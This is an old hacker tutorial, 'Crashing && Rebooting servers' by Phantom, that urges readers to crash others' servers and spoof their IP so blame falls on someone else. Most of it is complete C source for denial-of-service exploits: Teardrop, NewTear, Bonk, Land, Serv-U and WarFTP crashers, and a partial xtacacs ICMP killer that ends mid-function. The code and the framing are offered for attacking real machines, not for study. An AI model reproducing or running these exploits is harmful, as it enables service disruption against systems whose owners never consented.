		Crashing && Rebooting servers...
	-----------------------------------------------
						by Phantom

If you're reading this, then you're really evil, did you know that ?
:)
Enough with the formalities...You want to crash a server or maybe to
segfault some of the daemons running... Fine by me...
First step is to gather all information about the server you are trying to
kill.
You can telnet to it, see it's web page (if it has one), probe it, and
everything....
Now, if it is a Win 95 or Win NT, the job's easy... :)

Common to many systems:
------------------------

One good thing is Teardrop (works well with Linux/Win95/WinNT/ and so on,
because when you use it, you have the possibility to spoof your IP (for
beginners: it could appear like someone else has tried to crash them)...

Teardrop:
/*
 *  Copyright (c) 1997 route|daemon9  <route@infonexus.com> 11.3.97
 *
 *  Linux/NT/95 Overlap frag bug exploit
 *
 *  Exploits the overlapping IP fragment bug present in all Linux kernels and
 *  NT 4.0 / Windows 95 (others?)
 *
 *  Based off of:   flip.c by klepto
 *  Compiles on:    Linux, *BSD*
 *
 *  gcc -O2 teardrop.c -o teardrop
 *      OR
 *  gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
                        /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n)  (n)
#else                   /* OpenBSD 2.1, all Linux */
#define FIX(n)  htons(n)
#endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF   0x2000  /* More IP fragment en route */
#define IPH     0x14    /* IP header size */
#define UDPH    0x8     /* UDP header size */
#define PADDING 0x1c    /* datagram frame padding for first packet */
#define MAGIC   0x3     /* Magic Fragment Constant (tm).  Should be 2 or 3 */
#define COUNT   0x1     /* Linux dies with 1, NT is more stalwart and can
                         * withstand maybe 5 or 10 sometimes...  Experiment.
                         */
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);

int main(int argc, char **argv)
{
    int one = 1, count = 0, i, rip_sock;
    u_long  src_ip = 0, dst_ip = 0;
    u_short src_prt = 0, dst_prt = 0;
    struct in_addr addr;

    fprintf(stderr, "teardrop   route|daemon9\n\n");

    if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        perror("raw socket");
        exit(1);
    }
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
        < 0)
    {
        perror("IP_HDRINCL");
        exit(1);
    }
    if (argc < 3) usage(argv[0]);
    if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
    {
        fprintf(stderr, "What the hell kind of IP address is that?\n");
        exit(1);
    }

    while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
    {
        switch (i)
        {
            case 's':               /* source port (should be emphemeral) */
                src_prt = (u_short)atoi(optarg);
                break;
            case 't':               /* dest port (DNS, anyone?) */
                dst_prt = (u_short)atoi(optarg);
                break;
            case 'n':               /* number to send */
                count   = atoi(optarg);
                break;
            default :
                usage(argv[0]);
                break;              /* NOTREACHED */
        }
    }
    srandom((unsigned)(time((time_t)0)));
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count)   count   = COUNT;

    fprintf(stderr, "Death on flaxen wings:\n");
    addr.s_addr = src_ip;
    fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    fprintf(stderr, "  To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
    fprintf(stderr, " Amt: %5d\n", count);
    fprintf(stderr, "[ ");

    for (i = 0; i < count; i++)
    {
        send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
        fprintf(stderr, "b00m ");
        usleep(500);
    }
    fprintf(stderr, "]\n");
    return (0);
}

/*
 *  Send two IP fragments with pathological offsets.  We use an implementation
 *  independent way of assembling network packets that does not rely on any of
 *  the diverse O/S specific nomenclature hinderances (well, linux vs. BSD).
 */

void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                u_short dst_prt)
{
    u_char *packet = NULL, *p_ptr = NULL;   /* packet pointers */
    u_char byte;                            /* a byte */
    struct sockaddr_in sin;                 /* socket protocol structure */

    sin.sin_family      = AF_INET;
    sin.sin_port        = src_prt;
    sin.sin_addr.s_addr = dst_ip;

    /*
     * Grab some memory for our packet, align p_ptr to point at the beginning
     * of our packet, and then fill it with zeros.
     */
    packet = (u_char *)malloc(IPH + UDPH + PADDING);
    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    byte = 0x45;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) |= FIX(IP_MF);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + PADDING);   /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    /*  We set the fragment offset to be inside of the previous packet's
     *  payload (it overlaps inside the previous packet) but do not include
     *  enough payload to cover complete the datagram.  Just the header will
     *  do, but to crash NT/95 machines, a bit larger of packet seems to work
     *  better.
     */
    p_ptr = &packet[2];         /* IP total length is 2 bytes into the header *
/
    *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
    p_ptr += 4;                 /* IP offset is 6 bytes into the header */
    *((u_short *)p_ptr) = FIX(MAGIC);

    if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }
    free(packet);
}

u_long name_resolve(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;

    if ((addr.s_addr = inet_addr(host_name)) == -1)
    {
        if (!(host_ent = gethostbyname(host_name))) return (0);
        bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
    }
    return (addr.s_addr);
}

void usage(u_char *name)
{
    fprintf(stderr,
            "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
            name);
    exit(0);
}

Win95-WinNT:
-------------
You can use NewTear, Bonk, Land,WarFtpd_exploit and so on...
NewTear:

/*
 *  gcc -O2 teardrop.c -o teardrop
 *      OR
 *  gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
                        /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n)  (n)
#else                   /* OpenBSD 2.1, all Linux */
#define FIX(n)  htons(n)
#endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF   0x2000  /* More IP fragment en route */
#define IPH     0x14    /* IP header size */
#define UDPH    0x8     /* UDP header size */
#define PADDING 0x14    /* datagram frame padding for first packet */ /* JD Change pad size to 20 decimal. */
#define MAGIC   0x3     /* Magic Fragment Constant (tm).  Should be 2 or 3 */
#define COUNT   0x1     /* Linux dies with 1, NT is more stalwart and can
                         * withstand maybe 5 or 10 sometimes...  Experiment.
                         */
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);

int main(int argc, char **argv)
{
    int one = 1, count = 0, i, rip_sock;
    u_long  src_ip = 0, dst_ip = 0;
    u_short src_prt = 0, dst_prt = 0;
    struct in_addr addr;

    fprintf(stderr, "teardrop   route|daemon9\n\n");

    if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        perror("raw socket");
        exit(1);
    }
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
        < 0)
    {
        perror("IP_HDRINCL");
        exit(1);
    }
    if (argc < 3) usage(argv[0]);
    if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
    {
        fprintf(stderr, "What the hell kind of IP address is that?\n");
        exit(1);
    }

    while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
    {
        switch (i)
        {
            case 's':               /* source port (should be emphemeral) */
                src_prt = (u_short)atoi(optarg);
                break;
            case 't':               /* dest port (DNS, anyone?) */
                dst_prt = (u_short)atoi(optarg);
                break;
            case 'n':               /* number to send */
                count   = atoi(optarg);
                break;
            default :
                usage(argv[0]);
                break;              /* NOTREACHED */
        }
    }
    srandom((unsigned)(time((time_t)0)));
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count)   count   = COUNT;

    fprintf(stderr, "Death on flaxen wings:\n");
    addr.s_addr = src_ip;
    fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    fprintf(stderr, "  To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
    fprintf(stderr, " Amt: %5d\n", count);
    fprintf(stderr, "[ ");

    for (i = 0; i < count; i++)
    {
        send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
        fprintf(stderr, "b00m ");
        usleep(500);
    }
    fprintf(stderr, "]\n");
    return (0);
}

/*
 *  Send two IP fragments with pathological offsets.  We use an implementation
 *  independent way of assembling network packets that does not rely on any of
 *  the diverse O/S specific nomenclature hinderances (well, linux vs. BSD).
 */

void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                u_short dst_prt)
{
    u_char *packet = NULL, *p_ptr = NULL;   /* packet pointers */
    u_char byte;                            /* a byte */
    struct sockaddr_in sin;                 /* socket protocol structure */

    sin.sin_family      = AF_INET;
    sin.sin_port        = src_prt;
    sin.sin_addr.s_addr = dst_ip;

    /*
     * Grab some memory for our packet, align p_ptr to point at the beginning
     * of our packet, and then fill it with zeros.
     */
    packet = (u_char *)malloc(IPH + UDPH + PADDING);
    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING); // Set it all to zero

    byte = 0x45;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) |= FIX(IP_MF);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + PADDING*2);   /* UDP total length */ /* Increases UDP total length to 48 bytes
                                                     Which is too big! */

    if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    /*  We set the fragment offset to be inside of the previous packet's
     *  payload (it overlaps inside the previous packet) but do not include
     *  enough payload to cover complete the datagram.  Just the header will
     *  do, but to crash NT/95 machines, a bit larger of packet seems to work
     *  better.
     */
    p_ptr = &packet[2];         /* IP total length is 2 bytes into the header */
    *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
    p_ptr += 4;                 /* IP offset is 6 bytes into the header */
    *((u_short *)p_ptr) = FIX(MAGIC);

    if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }
    free(packet);
}

u_long name_resolve(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;

    if ((addr.s_addr = inet_addr(host_name)) == -1)
    {
        if (!(host_ent = gethostbyname(host_name))) return (0);
        bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
    }
    return (addr.s_addr);
}

void usage(u_char *name)
{
    fprintf(stderr,
            "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
            name);
    exit(0);
}

/* EOF */

Bonk:


#include <stdio.h>
#include <string.h>

#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_udp.h>
#include <netinet/protocols.h>
#include <arpa/inet.h>

#define FRG_CONST       0x3
#define PADDING         0x1c

struct udp_pkt
{
        struct iphdr    ip;
        struct udphdr   udp;
        char data[PADDING];
} pkt;

int     udplen=sizeof(struct udphdr),
        iplen=sizeof(struct iphdr),
        datalen=100,
        psize=sizeof(struct udphdr)+sizeof(struct iphdr)+PADDING,
        spf_sck;                        /* Socket */

void usage(void)
{
        fprintf(stderr, "Usage: ./bonk <src_addr> <dst_addr> [num]\n");
        exit(0);
}

u_long host_to_ip(char *host_name)
{
        static  u_long ip_bytes;
        struct hostent *res;

        res = gethostbyname(host_name);
        if (res == NULL)
                return (0);
        memcpy(&ip_bytes, res->h_addr, res->h_length);
        return (ip_bytes);
}

void quit(char *reason)
{
        perror(reason);
        close(spf_sck);
        exit(-1);
}

int fondle(int sck, u_long src_addr, u_long dst_addr, int src_prt,
           int dst_prt)
{
        int     bs;
        struct  sockaddr_in to;

        memset(&pkt, 0, psize);
                                                /* Fill in ip header */
        pkt.ip.version = 4;
        pkt.ip.ihl = 5;
        pkt.ip.tot_len = htons(udplen + iplen + PADDING);
        pkt.ip.id = htons(0x455);
        pkt.ip.ttl = 255;
        pkt.ip.protocol = IP_UDP;
        pkt.ip.saddr = src_addr;
        pkt.ip.daddr = dst_addr;
        pkt.ip.frag_off = htons(0x2000);        /* more to come */

        pkt.udp.source = htons(src_prt);        /* udp header */
        pkt.udp.dest = htons(dst_prt);
        pkt.udp.len = htons(8 + PADDING);
                                                /* send 1st frag */

        to.sin_family = AF_INET;
        to.sin_port = src_prt;
        to.sin_addr.s_addr = dst_addr;

        bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
                sizeof(struct sockaddr));

        pkt.ip.frag_off = htons(FRG_CONST + 1);         /* shinanigan */
        pkt.ip.tot_len = htons(iplen + FRG_CONST);
                                                        /* 2nd frag */

        bs = sendto(sck, &pkt, iplen + FRG_CONST + 1, 0,
                (struct sockaddr *) &to, sizeof(struct sockaddr));

        return bs;
}

void main(int argc, char *argv[])
{
        u_long  src_addr,
                dst_addr;

        int     i,
                src_prt=53,
                dst_prt=53,
                bs = 1,
                pkt_count = 10;         /* Default amount */

        if (argc < 3)
                usage();

        if (argc == 4)
                pkt_count = atoi(argv[3]);      /* 10 does the trick */

        /* Resolve hostnames */

        src_addr = host_to_ip(argv[1]);
        if (!src_addr)
                quit("bad source host");
        dst_addr = host_to_ip(argv[2]);
        if (!dst_addr)
                quit("bad target host");

        spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
        if (!spf_sck)
                quit("socket()");
        if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *) &bs,
        sizeof(bs)) < 0)
                quit("IP_HDRINCL");

        for (i = 0; i < pkt_count; ++i)
        {
                fondle(spf_sck, src_addr, dst_addr, src_prt, dst_prt);
                usleep(10000);
        }

        printf("Done.\n");
}

Land:

/*
Land attacks: 

BSDI 2.1 (vanilla)                      IS  vulnerable
BSDI 2.1 (K210-021,K210-022,K210-024)   NOT vulnerable
BSDI 3.0                                NOT vulnerable
Digital UNIX 4.0                        NOT vulnerable
FreeBSD 2.2.2-RELEASE                   IS  vulnerable
FreeBSD 2.2.5-RELEASE                   IS  vulnerable
FreeBSD 2.2.5-STABLE                    IS  vulnerable
FreeBSD 3.0-CURRENT                     IS  vulnerable
HP-UX 10.20                             IS  vulnerable
IRIX 6.2                                NOT vulnerable
Linux 2.0.30                            NOT vulnerable
Linux 2.0.32                            NOT vulnerable
MacOS 8.0                               IS  vulnerable 
NetBSD 1.2                              IS  vulnerable
NeXTSTEP 3.0                            IS  vulnerable
NeXTSTEp 3.1                            IS  vulnerable
Novell 4.11                             NOT vulnerable
OpenBSD 2.1                             IS  vulnerable
OpenBSD 2.2 (Oct31)                     NOT vulnerable
SCO OpenServer 5.0.4                    NOT vulnerable
Solaris 2.5.1                           IS  vulnerable 
SunOS 4.1.4                             IS  vulnerable
Windows 95 (vanilla)                    IS  vulnerable
Windows 95 + Winsock 2 + VIPUPD.EXE     IS  vulnerable
*/
/* land.c by m3lt, FLC
   crashes a win95 box */

#include <stdio.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>

struct pseudohdr
{
        struct in_addr saddr;
        struct in_addr daddr;
        u_char zero;
        u_char protocol;
        u_short length;
        struct tcphdr tcpheader;
};

u_short checksum(u_short * data,u_short length)
{
        register long value;
        u_short i;

        for(i=0;i<(length>>1);i++)
                value+=data[i];

        if((length&1)==1)
                value+=(data[i]<<8);

        value=(value&65535)+(value>>16);

        return(~value);
}

int main(int argc,char * * argv)
{
        struct sockaddr_in sin;
        struct hostent * hoste;
        int sock;
        char buffer[40];
        struct iphdr * ipheader=(struct iphdr *) buffer;
        struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
        struct pseudohdr pseudoheader;

        fprintf(stderr,"land.c by m3lt, FLC\n");

        if(argc<3)
        {
                fprintf(stderr,"usage: %s IP port\n",argv[0]);
                return(-1);
        }

        bzero(&sin,sizeof(struct sockaddr_in));
        sin.sin_family=AF_INET;

        if((hoste=gethostbyname(argv[1]))!=NULL)
                bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
        else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
        {
                fprintf(stderr,"unknown host %s\n",argv[1]);
                return(-1);
        }

        if((sin.sin_port=htons(atoi(argv[2])))==0)
        {
                fprintf(stderr,"unknown port %s\n",argv[2]);
                return(-1);
        }

        if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
        {
                fprintf(stderr,"couldn't allocate raw socket\n");
                return(-1);
        }

        bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
        ipheader->version=4;
        ipheader->ihl=sizeof(struct iphdr)/4;
        ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
        ipheader->id=htons(0xF1C);
        ipheader->ttl=255;
        ipheader->protocol=IP_TCP;
        ipheader->saddr=sin.sin_addr.s_addr;
        ipheader->daddr=sin.sin_addr.s_addr;

        tcpheader->th_sport=sin.sin_port;
        tcpheader->th_dport=sin.sin_port;
        tcpheader->th_seq=htonl(0xF1C);
        tcpheader->th_flags=TH_SYN;
        tcpheader->th_off=sizeof(struct tcphdr)/4;
        tcpheader->th_win=htons(2048);

        bzero(&pseudoheader,12+sizeof(struct tcphdr));
        pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
        pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
        pseudoheader.protocol=6;
        pseudoheader.length=htons(sizeof(struct tcphdr));
        bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
        tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));

        if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
        {
                fprintf(stderr,"couldn't send packet\n");
                return(-1);
        }

        fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);

        close(sock);
        return(0);
}

Warftpd_exploits (2 of 'em)...
-------------------------------
/*

        serv-who.c - 1998 - whiz
        kills Serv-U ftp on win95 boxes

        This program makes SERV-U32 cause
        a stack fault in module KERNEL32.DLL
        Sometimes after Serv-U crashes, windows
        becomes slow and non responsive,
        just an added bonus.  Another thing
        is that if the ftp is running on NT
        it usually won't crash, just raise
        CPU usage to 100% while the attack is
        running.

        Tested on:
        i586/100 - 72 meg RAM - crashed 5 times - Serv-U FTP-Server v2.3a
        i586/300 - 32 meg RAM - crashed 2 times - Serv-U FTP-Server v2.3b
        ?/? - ? meg RAM - crashed 2 times - Serv-U FTP-Server v2.3
        i586/233 - 32 meg RAM - crashed 1 time - Serv-U FTP-Server v2.2

        >>> Thanks to gen for helping me test this. <<<

        Another thing that might effect this
        program is how fast the serv-who
        computer's internet connection is.
        Or in other words how much faster is
        it then the victim's link.  A Faster
        one will give a higher success rate.

        serv-who, like, who the hell are
        you going to serv now, your crashed

*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

int x, s, i, p, dport;

char *str =
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
*
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;

int open_sock(int sock, char *server, int port) {
     struct sockaddr_in blah;
     struct hostent *he;
     bzero((char *)&blah,sizeof(blah));
     blah.sin_family=AF_INET;
     blah.sin_addr.s_addr=inet_addr(server);
     blah.sin_port=htons(port);

    if ((he = gethostbyname(server)) != NULL) {
        bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
    }
    else {
         if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
           perror("gethostbyname()");
           return(-3);
         }
    }

        if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
             perror("connect()");
             close(sock);
             return(-4);
        }
        printf("     Connected to [%s:%d].\n",server,port);
        return;
}

void main(int argc, char *argv[]) {
     int t;
     if (argc != 3) {
       printf("serv-who.c - whiz\n\n");
       printf("kills serv-u ftp daemons\n\n");
       printf("Usage: %s <victim> <port>\n",argv[0]);
       exit(0);
     }
     printf("serv-who.c - whiz\n\n");
     if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        perror("socket()");
        exit(-1);
     }
     p = atoi(argv[2]);
     open_sock(s,argv[1],p);

     printf("     Sending crap to %s on port %i... \n", argv[1], p);
     for (i=0; i<1000; i++) {            /* loop is REAL high, most likely
*/
       send(s,str,strlen(str),0x0);      /* it will exit with a */
                         send(s,str,strlen(str)*20+1,0x0); /* "Broken Pipe"
error before */
       send(s,str,strlen(str)*25+2,0x0); /* finishing the loop */
       send(s,str,strlen(str)*30+3,0x0);
       send(s,str,strlen(str)*35+4,0x0);
       send(s,str,strlen(str)*40+5,0x0); /* i just went crazy on the sends */
       send(s,str,strlen(str)*45+4,0x0); /* pay no attention to them */
       send(s,str,strlen(str)*50+5,0x0);
       send(s,str,strlen(str)*255+4,0x0);
       send(s,str,strlen(str)*182+5,0x0);
       send(s,str,strlen(str)*888+4,0x0);
       send(s,str,strlen(str)*666+5,0x0);
       send(s,str,strlen(str)*20+1,0x0);
       send(s,str,strlen(str)*25+2,0x0);
       send(s,str,strlen(str)*30+3,0x0);
       send(s,str,strlen(str)*35+4,0x0);
       send(s,str,strlen(str)*40+5,0x0);
       send(s,str,strlen(str)*45+4,0x0);
       send(s,str,strlen(str)*50+5,0x0);
       send(s,str,strlen(str)*255+4,0x0);
       send(s,str,strlen(str)*182+5,0x0);
       send(s,str,strlen(str)*888+4,0x0);
       send(s,str,strlen(str)*666+5,0x0);
     }
     printf("all done\n");
     close(s);
}


/*
 * WarFTP Killer by A|vin - 02/25/98
 * Contact : alvin@another-world.com
 *
 * Crashes WarFTP Win95/NT FTP daemon by sending a long
 * string in user authentification. Tested on WarFTP 1.65.
 *
 * Greetz : ackb0o, amplex, AFauveau, ben`be,  kewl,
 * Owlie, Parker, Rapha, Richelieu, Sibere, Voks.
 *
 * .oO GeMiNi C0rP iZ EvErYwHeRe Oo.
 */

#include <stdio.h>
#include <strings.h>
#include <errno.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

struct in_addr
resolv (char *name)
{
  static struct in_addr in;
  unsigned long l;
  struct hostent *ent;

  if ((l = inet_addr (name)) != INADDR_NONE)
    {
      in.s_addr = l;
      return in;
    }
  if (!(ent = gethostbyname (name)))
    {
      in.s_addr = INADDR_NONE;
      return in;
    }
  return *(struct in_addr *) ent->h_addr;
}

main (int argc, char *argv[])
{
  struct sockaddr_in addr;
  int i, s;
  char c;
  int port = 21;

  printf ("WarFTP Killer by A|vin - .oO GeMiNi C0rP iZ EvErYwHeRe
Oo.\n");
  if (argc < 2)
    {
      printf ("Usage : %s <host> [port]\n", argv[0]);
      exit (0);
    }
  if (argc == 3)
    port = atoi (argv[2]);
  s = socket (AF_INET, SOCK_STREAM, 0);
  addr.sin_family = AF_INET;
  addr.sin_addr = resolv (argv[1]);
  addr.sin_port = htons (port);
  connect (s, (struct sockaddr *) &addr, sizeof (addr));
  write (s, "USER ", 5);
  for (i = 1; i <= 500; i++)
    {
      write (s, "GeMiNi", 6);
    }
  write (s, "\n", 1);
  write (s, "PASS ", 5);
  for (i = 1; i <= 500; i++)
    {
      write (s, "C0rP", 4);
    }
  write (s, "\n", 1);
  read (s, &c, 1);
  printf("Done.\n");
}

XTACACS in standalone mode:
---------------------------

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

int size;

#define RESOLVE_QUIET
#define IPHDRSIZE sizeof(struct iphdr)
#define ICMPHDRSIZE sizeof(struct icmphdr)

unsigned char *dest_name;
unsigned char *origdest_name;
unsigned char *spoof_name = NULL;
struct sockaddr_in destaddr;
unsigned long origdest_addr;
unsigned long dest_addr;
unsigned long spoof_addr;
unsigned char type;
unsigned long seq;
int x=1;
int cize;
char *unreachables[] =  {"Network unreachable",
                         "Host unreachable",
                         "Protocol unreachable",
                         "Port unreachable",
                         "Fragmantation needed and DF set",
                         "Source route failed",
                         "Network unknown",
                         "Host unknown",
                         "Source host is isolated",
                         "Network administratively unreachable",
                         "Host administratively unreachable",
                         "Network unreachable - type of service",
                         "Host unreachable - type of service"};

void banner(void)
     {
        printf("\nxtacacs/udp killer v1.0 by Coaxial Karma\n");
        printf("modified version of nEWk.c (HyperioN)\n");
     }

void usage(const char *progname)
     {
        printf("usage:\n");
        printf("%s <source> <dest>\n\n",progname);
        printf("\t<source>   : address of fake ICMP packet sender\n");
        printf("\t<dest>     : destination of the unreach message\n");
        printf("\n");
     }

int resolve( const char *name, struct sockaddr_in *addr, int port )
     {
        struct hostent *host;

        bzero(addr,sizeof(struct sockaddr_in));

        if (( host = gethostbyname(name) ) == NULL )  {
#ifndef RESOLVE_QUIET
           fprintf(stderr,"unable to resolve host \"%s\" -- ",name);
           perror("");
#endif
           return -1;
        }

        addr->sin_family = host->h_addrtype;
        memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
        addr->sin_port = htons(port);

        return 0;
     }

int resolve_one(const char *name, unsigned long *addr, const char *desc)
     {
        struct sockaddr_in tempaddr;
        if (resolve(name, &tempaddr,0) == -1) {
           printf("error: can't resolve the %s.\n",desc);
           return -1;
        }

